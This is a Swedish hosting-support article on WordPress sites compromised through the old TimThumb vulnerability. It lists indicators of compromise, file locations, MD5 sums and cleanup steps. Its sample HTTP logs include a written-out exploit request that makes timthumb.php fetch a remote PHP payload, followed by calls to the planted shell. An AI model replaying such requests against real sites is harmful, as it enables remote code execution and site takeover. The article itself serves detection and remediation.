WordPress-kompromettering: TimThumb

TimThumb är ett verktyg som används av WordPress-teman och insticksprogram för att ändra storlek på bilder. Äldre versioner av TimThumb har en säkerhetsrisk som låter angripare ladda upp skadliga filer från en annan webbplats. Den första skadliga filen låter sedan angriparen ladda upp fler skadliga filer till värdtjänstkontot.

Mer information om intrång och hur de kan hanteras finns i Vad händer om min webbplats hackas?.

Tecken på att webbplatsen har komprometterats

Förutom de tecken som beskrivs i Vad händer om min webbplats hackas?, kan du se om din webbplats har påverkats av just den här komprometteringen om ditt konto innehåller filer med följande mönster i en insticksprogramskatalog:

  • external_[md5 hash].php – till exempel: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php – till exempel: 7eebe45bde5168488ac4010f0d65cea8.php

Det finns exempel på möjliga md5-hashvärden i avsnittet MD5SUMS för kända skadliga filer i den här artikeln.

Du kanske även hittar följande filer i rotkatalogen för din webbplats (mer information):

  • x.txt
  • logx.txt

Åtgärder

Du måste ta bort alla komprometterade och skadliga filer. Men innan du tar bort något rekommenderar vi att du gör en säkerhetskopia av din webbplats (mer information).

Leta upp skadliga filer

De skadliga filer som inledningsvis laddas upp via sårbarheten i TimThumb finns vanligtvis i en av följande kataloger, i katalogen /theme eller /plugin som innehåller den sårbara TimThumb-filen.

  • /tmp
  • /cache
  • /images

Exempel på platser för skadliga filer:

[webroot]/wp-content/themes/[tema med sårbart TimThumb]/cache/images/

Exempel på skadliga filers namn på dessa platser:

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

Filerna x.txt och logx.txt innehåller information om när en skadlig fil skapades genom att utnyttja sårbarheten i TimThumb samt den skadliga filens plats i värdtjänstkontot. Den här informationen är praktisk när du ska avgöra vilka filer som måste tas bort och var du kan hitta dem. Men den anger förmodligen inte en fullständig lista över filer som måste tas bort.

Ett exempel:

Dag: Tor, 11 apr 2013 06:21:15 -0700
IP: X.X.X.X
Webbläsare: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Url: /wp-content/themes/[tema med sårbart TimThumb]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

Filer som ska tas bort

Ta bort följande filer efter att du har säkerhetskopierat din webbplats:

  • x.txt
  • logx.txt
  • external_[md5 hash].php – till exempel: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php – till exempel: 7eebe45bde5168488ac4010f0d65cea8.php
  • Andra skadliga PHP-filer som hittas med md5-filer med hashnamn.

Du kan göra det via FTP (mer information) eller genom att använda filhanteraren på kontrollpanelen för ditt värdtjänstkonto (mer information).

Du bör även:

  • Uppdatera alla dina teman och insticksprogram till den senaste versionen.
  • Ersätta alla instanser av TimThumb.php med den senaste versionen som du hittar här.

Teknisk information

Exempel på HTTP-loggar

x.x.x.x - - [27/apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[tema med sårbart TimThumb]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[tema med sårbart TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[tema med sårbart TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[tema med sårbart TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

MD5SUMS för kända skadliga filer

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

Ytterligare skadliga filer

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

Var den här artikeln till hjälp?
Tack för din feedback. Ring vårt supportnummer eller starta chattalternativet ovan om du vill prata med en medarbetare på kundtjänst.
Vi är glada att vi kunde hjälpa till! Finns det något mer vi kan göra för dig?
Det var tråkigt att höra. Berätta vad som var krångligt eller varför lösningen inte hjälpte dig med problemet.